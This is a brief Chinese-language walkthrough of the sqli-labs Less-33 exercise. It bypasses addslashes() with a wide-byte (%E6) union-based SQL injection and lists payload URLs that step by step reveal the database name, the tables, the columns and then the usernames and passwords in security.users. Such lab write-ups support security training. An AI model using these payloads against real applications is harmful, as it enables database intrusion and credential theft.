Less(33)GET-Bypass AddSlasher()

1.和上一题一样的,payload都不用改

2.爆破

(1)爆库:?id=-1%E6‘ union select 1,2,database() --+

  Less(33)GET-Bypass AddSlasher()

(2)爆表:?id=-1%E6‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

  Less(33)GET-Bypass AddSlasher()

(3)爆列名:?id=-1%E6‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

  Less(33)GET-Bypass AddSlasher()

(4)爆值:?id=-1%E6‘ union select 1,group_concat(username,0x7e,password),3 from security.users --+

  Less(33)GET-Bypass AddSlasher()

相关推荐